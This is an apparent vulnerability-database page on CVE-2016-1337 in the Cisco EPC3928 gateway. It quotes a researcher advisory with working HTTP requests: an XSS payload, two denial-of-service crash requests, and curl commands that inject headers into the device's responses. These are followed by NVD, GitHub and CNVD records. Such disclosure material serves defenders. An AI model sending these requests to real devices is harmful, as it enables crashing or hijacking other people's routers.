192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: 192.168.1.1/WClientMACList.asp\nCookie: Lang=en; SessionID=109660\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\n\nsortWireless=mac\u0026h_sortWireless=mac\" onmouseover=alert(1) x=\"y\n\n#1 \\x96 Response:\nHTTP/1.0 302 Redirect\nServer: PS HTTP Server\nLocation: 192.168.1.1/WClientMACList.asp\nContent-type: text/html\nConnection: close\n#2 \\x96 Redirect request:\nGET /WClientMACList.asp HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: 192.168.1.1/WClientMACList.asp\nCookie: Lang=en; SessionID=109660\nConnection: keep-alive\n\n#2 \\x96 Reponse:\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nContent-Length: 7385\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n(...)\n\u003c/table\u003e\n\u003c/div\u003e\n\u003cinput type=\"hidden\" name=\"h_sortWireless\" value=\"mac\" onmouseover=alert(1) x=\"y\" /\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n(...)\n\n\n\n- Gateway Client List Denial of Service\n\nDevice will crash after sending following request. \n\n# HTTP Request\nPOST /goform/WClientMACList HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/WClientMACList.asp\nCookie: Lang=en; SessionID=109660\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\n\nsortWireless=mac\u0026h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n\n\n\n- Gateway HTTP Corruption Denial of Service\n\nDevice will crash after sending following request. \n\n# HTTP Request\nPOST /goform/Docsis_system HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Docsis_system.asp\nCookie: Lang=en; SessionID=348080\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 106\n\nusername_login=\u0026password_login=\u0026LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0026Language_Submit=0\u0026login=Log+In\n\n\n\n- \"Stored\" HTTP Response Injection\n\nIt is able to inject additional HTTP data to response, if string parameter of LanguageSelect won\u0027t be too long (in that case device will crash). \nAdditional data will be stored in device memory and returned with every http response on port 80 until reboot. \n\ndevil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nContent-Length: 1469\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"\u003e\n\u003chtml lang=\"en\"\u003e\n\ndevil@hell:~$ curl --data \"username_login=\u0026password_login=\u0026LanguageSelect=en%0d%0aSet-Cookie: w00t\u0026Language_Submit=0\u0026login=Log+In\" http://192.168.1.1/goform/Docsis_system -s \u003e /dev/null\n\ndevil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nSet-Cookie: Lang=en\nSet-Cookie: w00t\nSet-Cookie: SessionID=657670\nContent-Length: 1469\n\n\n\n- Boot Information Disclosure\n\nIn early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials. \n\nExploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo\n\n\n========\n\nCVE References:\nCVE-2015-6401\nCVE-2015-6402\nCVE-2016-1328\nCVE-2016-1336\nCVE-2016-1337\n\nCisco Bug ID\\x92s:\nCSCux24935\nCSCux24938\nCSCux24941\nCSCux24948\nCSCuy28100\nCSCux17178\n\nRead more on our blog:\nhttp://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-1337"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "db": "BID",
        "id": "91541"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90156"
      },
      {
        "db": "PACKETSTORM",
        "id": "137379"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-90156",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90156"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-1337",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "91541",
        "trust": 1.4
      },
      {
        "db": "PACKETSTORM",
        "id": "137379",
        "trust": 1.3
      },
      {
        "db": "EXPLOIT-DB",
        "id": "39904",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-294",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-90156",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90156"
      },
      {
        "db": "BID",
        "id": "91541"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "db": "PACKETSTORM",
        "id": "137379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1337"
      }
    ]
  },
  "id": "VAR-201607-0005",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90156"
      }
    ],
    "trust": 1.325
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      }
    ]
  },
  "last_update_date": "2024-02-14T22:51:04.023000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Cisco Model DPC3928/EPC3928 DOCSIS/EuroDOCSIS 3.0 8x4 Wireless Residential Gateway with Embedded Digital Voice Adapter User Guide",
        "trust": 0.8,
        "url": "http://www.cisco.com/c/dam/en/us/td/docs/video/at_home/cable_modems/3900_series/ol-29161-01.pdf"
      },
      {
        "title": "CiscoEPC3928 Information Disclosure Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/78583"
      },
      {
        "title": "Cisco EPC3928 Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=62592"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.9
      },
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90156"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1337"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
      },
      {
        "trust": 2.0,
        "url": "http://www.securityfocus.com/archive/1/archive/1/538627/100/0/threaded"
      },
      {
        "trust": 1.2,
        "url": "http://packetstormsecurity.com/files/137379/cisco-epc-3928-xss-dos-command-execution.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/91541"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/39904/"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1337"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1337"
      },
      {
        "trust": 0.4,
        "url": "http://www.cisco.com/"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/index.asp\"\u003e\u003cscript"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/administration.asp"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1336"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1337"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/docsis_system.asp"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/goform/docsis_system"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6401"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/channelsselection.asp"
      },
      {
        "trust": 0.1,
        "url": "https://www.youtube.com/watch?v=phsx0s7turo"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6402"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/docsis_log.asp"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wclientmaclist.asp"
      },
      {
        "trust": 0.1,
        "url": "http://secorda.com/)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1328"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1\u0027\",totaltime*1000);}mytime=setinterval(\u0027time()\u0027,1000);\u003c/script\u003e\u003c/head\u003e\u003cbody"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90156"
      },
      {
        "db": "BID",
        "id": "91541"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "db": "PACKETSTORM",
        "id": "137379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1337"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90156"
      },
      {
        "db": "BID",
        "id": "91541"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "db": "PACKETSTORM",
        "id": "137379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1337"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-07-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "date": "2016-07-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-90156"
      },
      {
        "date": "2016-07-03T00:00:00",
        "db": "BID",
        "id": "91541"
      },
      {
        "date": "2016-07-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "date": "2016-06-08T13:22:22",
        "db": "PACKETSTORM",
        "id": "137379"
      },
      {
        "date": "2016-06-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      },
      {
        "date": "2016-07-03T21:59:06.727000",
        "db": "NVD",
        "id": "CVE-2016-1337"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-07-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "date": "2018-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-90156"
      },
      {
        "date": "2016-07-03T00:00:00",
        "db": "BID",
        "id": "91541"
      },
      {
        "date": "2016-07-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "date": "2016-07-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      },
      {
        "date": "2024-02-14T01:17:43.863000",
        "db": "NVD",
        "id": "CVE-2016-1337"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco EPC3928 Vulnerability in obtaining critical settings and credentials on devices",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      }
    ],
    "trust": 0.6
  }
}

FKIE_CVE-2016-1337

Vulnerability from fkie_nvd - Published: 2016-07-03 21:59 - Updated: 2025-04-12 10:46

Severity ?

8.1 (High) - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
psirt@cisco.com	http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/	Exploit, URL Repurposed
psirt@cisco.com	http://www.securityfocus.com/archive/1/538627/100/0/threaded
psirt@cisco.com	http://www.securityfocus.com/bid/91541
psirt@cisco.com	https://www.exploit-db.com/exploits/39904/
af854a3a-2127-422b-91ae-364da2661108	http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/	Exploit, URL Repurposed
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/538627/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/91541
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/39904/

Impacted products

	Vendor	Product	Version
	cisco	epc3928_firmware	-
	cisco	epc3928	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:cisco:epc3928_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "8400FC4F-2601-4746-9997-3B00747C4F57",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:cisco:epc3928:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEBC35E0-EAC0-4D49-AE66-C67EFD50C171",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a \"Boot Information Disclosure\" issue, aka Bug ID CSCux17178."
    },
    {
      "lang": "es",
      "value": "Dispositivos Cisco EPC3928 permiten a atacantes remotos obtener configuraci\u00f3n sensible e informaci\u00f3n de credenciales haciendo peticiones durante la parte temprana del proceso de inicio, vinculado a un problema \"Boot Information Disclosure\", tambi\u00e9n conocido como Bug ID CSCux17178."
    }
  ],
  "id": "CVE-2016-1337",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2016-07-03T21:59:06.727",
  "references": [
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Exploit",
        "URL Repurposed"
      ],
      "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
    },
    {
      "source": "psirt@cisco.com",
      "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
    },
    {
      "source": "psirt@cisco.com",
      "url": "http://www.securityfocus.com/bid/91541"
    },
    {
      "source": "psirt@cisco.com",
      "url": "https://www.exploit-db.com/exploits/39904/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "URL Repurposed"
      ],
      "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/91541"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/39904/"
    }
  ],
  "sourceIdentifier": "psirt@cisco.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        },
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-JMC5-W94V-7P94

Vulnerability from github – Published: 2022-05-14 02:47 – Updated: 2025-04-12 13:01

Details

Severity ?

8.1 (High)


                  
                    CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2016-1337"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-07-03T21:59:00Z",
    "severity": "HIGH"
  },
  "details": "Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a \"Boot Information Disclosure\" issue, aka Bug ID CSCux17178.",
  "id": "GHSA-jmc5-w94v-7p94",
  "modified": "2025-04-12T13:01:44Z",
  "published": "2022-05-14T02:47:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1337"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/39904"
    },
    {
      "type": "WEB",
      "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/91541"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

CNVD-2016-04560

Vulnerability from cnvd - Published: 2016-07-06

Title

Cisco EPC3928信息泄露漏洞

Description

Cisco EPC3928是美国思科（Cisco）公司的一款无线路由器产品。 Cisco EPC3928中存在安全漏洞。远程攻击者可通过在boot进程的前期发送请求利用该漏洞获取敏感的配置和证书信息。

Severity

中

Patch Name

Cisco EPC3928信息泄露漏洞的补丁

Patch Description

Cisco EPC3928是美国思科（Cisco）公司的一款无线路由器产品。 Cisco EPC3928中存在安全漏洞。远程攻击者可通过在boot进程的前期发送请求利用该漏洞获取敏感的配置和证书信息。目前，供应商发布了安全公告及相关补丁信息，修复了此漏洞。

Formal description

目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页： http://www.cisco.com/

Reference

http://packetstormsecurity.com/files/137379/Cisco-EPC-3928-XSS-DoS-Command-Execution.html http://www.securityfocus.com/archive/1/archive/1/538627/100/0/threaded

Impacted products

Name
Cisco EPC3928

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2016-1337"
    }
  },
  "description": "Cisco EPC3928\u662f\u7f8e\u56fd\u601d\u79d1\uff08Cisco\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u65e0\u7ebf\u8def\u7531\u5668\u4ea7\u54c1\u3002\r\n\r\nCisco EPC3928\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5728boot\u8fdb\u7a0b\u7684\u524d\u671f\u53d1\u9001\u8bf7\u6c42\u5229\u7528\u8be5\u6f0f\u6d1e\u83b7\u53d6\u654f\u611f\u7684\u914d\u7f6e\u548c\u8bc1\u4e66\u4fe1\u606f\u3002",
  "discovererName": "Patryk Bogdan from Secorda security team",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u8be6\u60c5\u8bf7\u5173\u6ce8\u5382\u5546\u4e3b\u9875\uff1a\r\nhttp://www.cisco.com/",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2016-04560",
  "openTime": "2016-07-06",
  "patchDescription": "Cisco EPC3928\u662f\u7f8e\u56fd\u601d\u79d1\uff08Cisco\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u65e0\u7ebf\u8def\u7531\u5668\u4ea7\u54c1\u3002\r\n\r\nCisco EPC3928\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5728boot\u8fdb\u7a0b\u7684\u524d\u671f\u53d1\u9001\u8bf7\u6c42\u5229\u7528\u8be5\u6f0f\u6d1e\u83b7\u53d6\u654f\u611f\u7684\u914d\u7f6e\u548c\u8bc1\u4e66\u4fe1\u606f\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Cisco EPC3928\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Cisco EPC3928"
  },
  "referenceLink": "http://packetstormsecurity.com/files/137379/Cisco-EPC-3928-XSS-DoS-Command-Execution.html\r\nhttp://www.securityfocus.com/archive/1/archive/1/538627/100/0/threaded",
  "serverity": "\u4e2d",
  "submitTime": "2016-07-05",
  "title": "Cisco EPC3928\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2016-1337 (GCVE-0-2016-1337)

GSD-2016-1337

VAR-201607-0005

1 - Channel selection request:

1 - Response:

dw(msg_goform34);dw(msg_goform35);refreshStatus();

2 - Clear logs request:

2 - Response:

1 \x96 Stored XSS via username change request:

1 \x96 Response:

2 \x96 Redirect request:

2 \x96 Response:

FKIE_CVE-2016-1337

GHSA-JMC5-W94V-7P94

CNVD-2016-04560

Tags

Sightings

Nomenclature